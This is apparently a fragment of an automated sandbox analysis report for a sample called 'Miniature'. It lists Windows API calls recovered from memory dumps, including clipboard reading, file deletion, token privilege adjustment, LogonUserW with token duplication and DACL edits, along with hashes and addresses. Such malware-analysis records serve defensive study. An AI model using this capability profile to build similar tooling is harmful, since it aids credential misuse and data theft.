                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00C13963
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00C13A76
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000000,?,00C50A84,?,?,00000000,?,00C50A84,00000000,0000000C), ref: 00C50737
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,00C7D840), ref: 00C7EAB1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DC54: FindFirstFileW.KERNEL32(?,?), ref: 00C7DCCB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00C7DD1B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C7DD2C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7DC54: FindClose.KERNEL32(00000000), ref: 00C7DD43
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C8666E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C7205A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C72087
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C72010: GetLastError.KERNEL32 ref: 00C72097
                                                                                                                                                                                                                                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C71BD2
                                                                                                                                                                                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C71BF4
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C71C05
                                                                                                                                                                                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C71C1D
                                                                                                                                                                                                                                                                                            • GetProcessWindowStation.USER32 ref: 00C71C36
                                                                                                                                                                                                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 00C71C40
                                                                                                                                                                                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C71C5C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C71B48), ref: 00C71A20
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A0B: CloseHandle.KERNEL32(?,?,00C71B48), ref: 00C71A35
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                                            • String ID: $default$winsta0
                                                                                                                                                                                                                                                                                            • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C71A60
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A6C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A7B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C714E7,?,?,?), ref: 00C71A82
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C71A99
                                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C71518
                                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C7154C
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C71563
                                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00C7159D
                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C715B9
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C715D0
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C715D8
                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C715DF
                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C71600
                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00C71607
                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C71636
                                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C71658
                                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C7166A
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C71691
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C71698
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C716A1
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C716A8
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C716B1
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C716B8
                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C716C4
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C716CB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71ADF: GetProcessHeap.KERNEL32(00000008,00C714FD,?,00000000,?,00C714FD,?), ref: 00C71AED
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C714FD,?), ref: 00C71AF4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C71ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C714FD,?), ref: 00C71B03
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 00986941e1ced0c48aa57f8532cd847fca7af995a182bdb99d0654a015b860d9
                                                                                                                                                                                                                                                                                            • Instruction ID: 8003d85fa00772d5b0717852884add12a283e76073e9716b2b0545b86058e532
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00986941e1ced0c48aa57f8532cd847fca7af995a182bdb99d0654a015b860d9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24713CB2900209ABDF109FA9DC44FEEBBB8FF05754F188515F92AA7190D771DA05CBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(00CADCD0), ref: 00C8F586
                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C8F594
                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00C8F5A0
                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00C8F5AC
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C8F5E4
                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00C8F5EE
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C8F619
                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00C8F626
                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 00C8F62E
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C8F63F
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C8F67F
                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 00C8F695
                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000F), ref: 00C8F6A1
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C8F6B2
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C8F6D4
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C8F6F1
                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C8F72F
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C8F750
                                                                                                                                                                                                                                                                                            • CountClipboardFormats.USER32 ref: 00C8F771
                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00C8F7B6
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 59484f16ef5e044cc48560e828815b56736780e417c86b3e6e924f0aff5cd8f2
                                                                                                                                                                                                                                                                                            • Instruction ID: e7e02b117245cffcdffa0a28c8978b2e57d02394016646f94b03561baa609ec3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59484f16ef5e044cc48560e828815b56736780e417c86b3e6e924f0aff5cd8f2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C661B135204201AFD300FF20D895FAAB7A4EF86718F14456DF497876A2DB31EE46DB62
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C87403
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C87457
                                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C87493
                                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C874BA
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1B329: _wcslen.LIBCMT ref: 00C1B333
                                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C874F7
                                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C87524
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                            • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                            • Opcode ID: 468235a9060db46edf96b7f09b540efcf2bc6e88bb385f9068a57e1446b5b004
                                                                                                                                                                                                                                                                                            • Instruction ID: e87c9304bd204c3a19edfd443d5a64c05f2a1d3248952382c141886f2da63393
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 468235a9060db46edf96b7f09b540efcf2bc6e88bb385f9068a57e1446b5b004
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EAD15F72508344AFC310EB64C885EAFB7ECAF89704F44492DF585D6291EB74DA48EB62
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00C8A0A8
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C8A0E6
                                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00C8A100
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C8A118
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C8A123
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C8A13F
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C8A18F
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00CD7B94), ref: 00C8A1AD
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C8A1B7
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C8A1C4
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C8A1D4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                            • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                            • Opcode ID: ef35d2251f2f6554d6145ab48c454d7444faf78b9cd3423fa5dcc22b96ef9bb3
                                                                                                                                                                                                                                                                                            • Instruction ID: dbcd4ef050796911618a62967473146ff8a1260339a12e55b9fbab5baff2065d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ef35d2251f2f6554d6145ab48c454d7444faf78b9cd3423fa5dcc22b96ef9bb3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3131B532501219BBEF10ABB4DC4DBDE77ACAF05328F100166E926E3190EB74DE45CB69
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C84785
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C847B2
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C847E2
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C84803
                                                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00C84813
                                                                                                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C8489A
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C848A5
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C848B0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                            • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                            • Opcode ID: 75a582bc5358bad8fe31e174afb78363c9301c4ec9bbf1a766f8ee7973a75b43
                                                                                                                                                                                                                                                                                            • Instruction ID: 13a4730fa8c2ddfd976ff554844a7e570505e8e5bc16fa00b03cd34804b80bff
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75a582bc5358bad8fe31e174afb78363c9301c4ec9bbf1a766f8ee7973a75b43
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B31907150025AAADB21ABA0DC49FEF37BCEF89759F1041B6F61AD20A0E7709744CB24
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00C8A203
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C8A25E
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C8A269
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C8A285
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C8A2D5
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00CD7B94), ref: 00C8A2F3
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C8A2FD
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C8A30A
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C8A31A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C7E3B4
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
